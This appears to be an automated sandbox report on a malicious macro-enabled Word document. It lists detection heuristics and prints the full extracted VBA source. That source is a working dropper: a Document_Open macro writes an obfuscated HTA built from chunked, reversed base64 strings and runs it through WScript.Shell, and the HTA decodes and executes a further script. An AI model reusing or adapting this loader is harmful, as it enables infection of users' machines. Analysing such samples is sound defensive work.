MALICIOUS
170
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set counterText = CreateObject("wscript.shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set counterText = CreateObject("wscript.shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10513 bytes |
SHA-256: 712dcf0057eeb74db2be1597513f109ce98171d9a7192399739f4e8f59418f77 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub
Attribute VB_Name = "frm"
Attribute VB_Base = "0{FFDF38BB-869A-4711-9C91-2F8E303A2472}{9B2C7F4A-33DD-4077-8743-6F13775E1956}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set indexTitleTemp = ActiveDocument.BuiltInDocumentProperties("title")
Set counterText = CreateObject("wscript.shell")
With counterText
.exec$ (indexTitleTemp)
End With
End Sub
Attribute VB_Name = "rightTitleResponse"
Sub main()
repoArgument
End Sub
Function gwc(databaseLeft)
If Len(databaseLeft) > 0 Then
gwc = databaseLeft
End If
End Function
Sub repoArgument()
Dim lenFunc As String
procedureCopy = Split(ActiveDocument.BuiltInDocumentProperties("title"), " ")
lenFunc = procedureCopy(1)
Set lenMemGlobal = New varMem
lenMemGlobal.leftDataBorder lenFunc, arrayLink
frm.button1_Click
End Sub
Attribute VB_Name = "nextRequest"
Function tableNext(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then tableNext = gwc("<htm" & "l><b" & "ody>" & "<div" & " id=" & "'con" & "tent" & "'>fT" & "tlc2" & "9sYy" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "spMi" & "AsIm" & "dwai" & "5sYW" & "JvbE" & "d0bm" & "VtdW" & "NvZF" & "xcY2" & "lsYn" & "VwXF" & "xzcm" & "VzdV" & "xcOm" & "MiKG" & "VsaW" & "ZvdG" & "V2YX" & "MueG" & "9idH" & "NpTH" & "BtZX" & "Q7KX" & "lkb2" & "Jlc2" & "5vcH" & "Nlci" & "54RW" & "ZlUm" & "Z1Yi" & "hldG" & "lydy" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "sxID" & "0gZX" & "B5dC" & "54b2" & "J0c2" & "lMcG" & "1ldD" & "tuZX" & "BvLn" & "hvYn" & "RzaU" & "xwbW" & "V0Oy" & "kibW" & "Flcn" & "RzLm" & "Jkb2" & "RhIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hvYn" & "RzaU" & "xwbW" & "V0IH" & "Jhdn" & "spMD" & "AyID" & "09IH" & "N1dG" & "F0cy" & "54RW" & "ZlUm" & "Z1Yi" & "hmaT" & "spKG" & "RuZX" & "MueE" & "VmZV" & "JmdW" & "I7KW" & "VzbG" & "FmIC" & "wiaz" & "Budz" & "ZTSz")
End Function
Function leftSelectConvert(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then leftSelectConvert = gwc("cwRm" & "p3M3" & "lSRk" & "5hRl" & "ZmPW" & "hjcm" & "Flcy" & "ZYS0" & "laV3" & "gwNU" & "pGR1" & "c9ZW" & "dhcC" & "Zzb2" & "JRMk" & "5tbk" & "E5d3" & "F4dF" & "FMTG" & "hYR0" & "dDMV" & "hjMU" & "k9cm" & "VzdS" & "ZiZD" & "lFNG" & "ZVcX" & "hMVG" & "5mM3" & "Z5bV" & "NFdH" & "d4S2" & "JUTk" & "djOD" & "1mZX" & "Imb0" & "xmTW" & "t4PS" & "Yyen" & "RteV" & "J3Z1" & "JWeX" & "RmYk" & "M5PW" & "hjcm" & "Flcy" & "ZWU3" & "FzWm" & "JITV" & "lHTm" & "gyYk" & "NzUV" & "Y9ZW" & "dhcC" & "ZJen" & "VOUT" & "BVTD" & "ROOT" & "ZIa2" & "VYdD" & "1lbW" & "l0Pz" & "JydX" & "YvTn" & "dsYz" & "NqSG" & "JHNG" & "NzQW" & "p2am" & "M2TH" & "dwV0" & "VuQ1" & "NpRU" & "txbi" & "83ND" & "M0Ni" & "81US" & "9pOU" & "VlNF" & "owQU" & "ZMOT" & "hSb0" & "J6V2" & "hvME" & "hrND" & "hwV0" & "Q1UT" & "FEeG" & "owN0" & "R5Lz" & "FTSD" & "VUM0" & "w5Um" & "5qTj" & "ZDLz" & "c0Mj" & "cyLz" & "R2d3" & "VBN3" & "diZH")
End Function
Function countTmp(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then countTmp = gwc("NwVV" & "UyUl" & "kxVD" & "A4dX" & "l3SE" & "o0en" & "FDWE" & "1Cem" & "ZrMH" & "Z0U1" & "Yvc2" & "9zZ2" & "QvbW" & "9jLj" & "QwMD" & "JpeG" & "F0eX" & "Jvdm" & "kvLz" & "pwdH" & "RoIi" & "AsIl" & "RFRy" & "Iobm" & "Vwby" & "54RW" & "ZlUm" & "Z1Yj" & "spIn" & "B0dG" & "hsbX" & "guMm" & "xteH" & "NtIi" & "h0Y2" & "VqYk" & "9YZX" & "ZpdG" & "NBIH" & "dlbi" & "A9IH" & "hFZm" & "VSZn" & "ViIH" & "Jhdg" & "==|f" & "XspY" & "251R" & "nhFb" & "m90d" & "HViK" & "Ghjd" & "GFjf" & "TspI" & "mF0a" & "C5sY" & "WJvb" & "Ed0b" & "mVtd" & "WNvZ" & "FxcY" & "2lsY" & "nVwX" & "Fxzc" & "mVzd" & "VxcO" & "mMiK" & "GVsa" & "WZld" & "GVsZ" & "WQuY" & "251R" & "nBtZ" & "XR7e" & "XJ0O" & "ykid" & "GNla" & "mJvb" & "WV0c" & "3lzZ" & "WxpZ" & "i5nb" & "ml0c" & "GlyY" & "3MiK" & "HRjZ" & "WpiT" & "1hld" & "ml0Y" & "0Egd" & "2VuI" & "D0gY" & "251R" & "nBtZ" & "XQgc" & "mF2O" & "ykiZ" & "3BqL" & "mxhY" & "m9sR")
End Function
Function removeDatabase(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then removeDatabase = gwc("3RuZ" & "W11Y" & "29kX" & "Fxja" & "Wxid" & "XBcX" & "HNyZ" & "XN1X" & "Fw6Y" & "yAyM" & "3J2c" & "2dlc" & "iIob" & "nVyL" & "ikib" & "Gxla" & "HMud" & "HBpc" & "mNzd" & "yIod" & "GNla" & "mJPW" & "GV2a" & "XRjQ" & "SB3Z" & "W4=<" & "/div" & "><di" & "v id" & "='ta" & "ble1" & "'>AB" & "CDEF" & "GHIJ" & "KLMN" & "OPQR" & "STUV" & "WXYZ" & "</di" & "v><d" & "iv i" & "d='t" & "able" & "2'>0" & "1234" & "5678" & "9+/<" & "/div" & "><di" & "v id" & "='ta" & "ble3" & "'></" & "div>" & "<scr" & "ipt " & "lang" & "uage" & "='ja" & "vasc" & "ript" & "'>fu" & "ncti" & "on d" & "ocum" & "entC" & "onve" & "rt(i" & "ndex" & "Inde" & "xDat" & "a){r" & "etur" & "n(ne" & "w Ac" & "tive" & "XObj" & "ect(" & "inde" & "xInd" & "exDa" & "ta))" & ";}fu" & "ncti" & "on l" & "enW(" & "coun" & "tCon" & "stTe" & "xtbo" & "x){r" & "etur" & "n(sc" & "reen" & "Capt" & "ion." & "getE" & "leme" & "ntBy" & "Id(c")
End Function
Function documentLocal(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then documentLocal = gwc("ount" & "Cons" & "tTex" & "tbox" & ").in" & "nerH" & "TML)" & ";}fu" & "ncti" & "on c" & "apti" & "onMe" & "mSwa" & "p(){" & "var " & "glob" & "alCo" & "unt " & "= le" & "nW('" & "tabl" & "e1')" & ";var" & " var" & "Scre" & "en =" & " glo" & "balC" & "ount" & ".toL" & "ower" & "Case" & "();v" & "ar c" & "onve" & "rtPa" & "ste " & "= le" & "nW('" & "tabl" & "e2')" & ";ret" & "urn(" & "glob" & "alCo" & "unt " & "+ va" & "rScr" & "een " & "+ co" & "nver" & "tPas" & "te);" & "}fun" & "ctio" & "n ar" & "gume" & "ntPt" & "rTru" & "st(s" & "){va" & "r e=" & "{}; " & "var " & "i; v" & "ar b" & "=0; " & "var " & "c; v" & "ar x" & "; va" & "r l=" & "0; v" & "ar a" & "; va" & "r li" & "bBuf" & "ferD" & "atab" & "ase=" & "''; " & "var " & "w=St" & "ring" & ".fro" & "mCha" & "rCod" & "e; v" & "ar L" & "=s.l" & "engt" & "h;va" & "r li" & "stbo" & "xPas" & "teLi" & "b = " & "resp" & "onse" & "Left")
End Function
Function pointerNamespaceRef(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then pointerNamespaceRef = gwc("('tA" & "rahc" & "');f" & "or(i" & "=0;i" & "<64;" & "i++)" & "{e[c" & "apti" & "onMe" & "mSwa" & "p()[" & "list" & "boxP" & "aste" & "Lib]" & "(i)]" & "=i;}" & "for(" & "x=0;" & "x<L;" & "x++)" & "{c=e" & "[s[l" & "istb" & "oxPa" & "steL" & "ib](" & "x)];" & "b=(b" & "<<6)" & "+c;l" & "+=6;" & "whil" & "e(l>" & "=8){" & "((a=" & "(b>>" & ">(l-" & "=8))" & "&0xf" & "f)||" & "(x<(" & "L-2)" & "))&&" & "(lib" & "Buff" & "erDa" & "taba" & "se+=" & "w(a)" & ");}}" & "retu" & "rn(l" & "ibBu" & "ffer" & "Data" & "base" & ");};" & "func" & "tion" & " res" & "pons" & "eLef" & "t(co" & "llec" & "tion" & "Proc" & "Stru" & "ct){" & "retu" & "rn c" & "olle" & "ctio" & "nPro" & "cStr" & "uct." & "spli" & "t(''" & ").re" & "vers" & "e()." & "join" & "('')" & ";}sc" & "reen" & "Cons" & "tVie" & "w = " & "wind" & "ow;s" & "cree" & "nCap" & "tion" & " = d" & "ocum" & "ent;" & "scre" & "enCo" & "nstV")
End Function
Function variableException(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then variableException = gwc("iew." & "resi" & "zeTo" & "(1, " & "1);s" & "cree" & "nCon" & "stVi" & "ew.m" & "oveT" & "o(-1" & "00, " & "-100" & ");va" & "r cl" & "earR" & "epoT" & "rust" & " = s" & "cree" & "nCap" & "tion" & ".get" & "Elem" & "entB" & "yId(" & "'con" & "tent" & "').i" & "nner" & "HTML" & ";var" & " cle" & "arRe" & "poTr" & "ust " & "= cl" & "earR" & "epoT" & "rust" & ".spl" & "it('" & "|');" & "var " & "quer" & "yCon" & "st =" & " res" & "pons" & "eLef" & "t(ar" & "gume" & "ntPt" & "rTru" & "st(c" & "lear" & "Repo" & "Trus" & "t[0]" & "));v" & "ar f" & "uncV" & "aria" & "ble " & "= re" & "spon" & "seLe" & "ft(a" & "rgum" & "entP" & "trTr" & "ust(" & "clea" & "rRep" & "oTru" & "st[1" & "]));" & "</sc" & "ript" & "><sc" & "ript" & " lan" & "guag" & "e='j" & "avas" & "crip" & "t'>f" & "unct" & "ion " & "valu" & "eQue" & "ryGe" & "neri" & "c(li" & "bIte" & "rato" & "r){v" & "ar s" & "izeT" & "emp ")
End Function
Function variableEx(rightExceptionLeft)
Dim ptrArgument As Integer
ptrArgument = 31337
If (Len(rightExceptionLeft) < ptrArgument) Then variableEx = gwc("= do" & "cume" & "ntCo" & "nver" & "t(re" & "spon" & "seLe" & "ft('" & "lort" & "noct" & "pirc" & "s.lo" & "rtno" & "ctpi" & "rcss" & "m'))" & ";siz" & "eTem" & "p['L" & "angu" & "age'" & "] = " & "'jsc" & "ript" & "';si" & "zeTe" & "mp['" & "Time" & "out'" & "] = " & "6000" & "0;si" & "zeTe" & "mp['" & "AddC" & "ode'" & "](li" & "bIte" & "rato" & "r);r" & "etur" & "n(nu" & "ll);" & "}</s" & "crip" & "t><s" & "crip" & "t la" & "ngua" & "ge='" & "vbsc" & "ript" & "'>va" & "lueQ" & "uery" & "Gene" & "ric " & "quer" & "yCon" & "st :" & " val" & "ueQu" & "eryG" & "ener" & "ic f" & "uncV" & "aria" & "ble " & ": sc" & "reen" & "Cons" & "tVie" & "w.cl" & "ose<" & "/scr" & "ipt>" & "</bo" & "dy><" & "/htm" & "l>")
End Function
Function arrayLink()
arrayLink = tableNext("roce") + leftSelectConvert("arCo") + countTmp("bBor") + removeDatabase("oint") + documentLocal("itle") + pointerNamespaceRef("extb") + variableException("able") + variableEx("elec")
End Function
Attribute VB_Name = "varMem"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function leftDataBorder(classStructValue As String, mainListException As String)
Open classStructValue For Output As #1
Print #1, mainListException
Close #1
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 37376 bytes |
SHA-256: a565a357bef7a0f0875fe23ff4d7df4ce3796239e09661d2c9726d6158381fb4 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.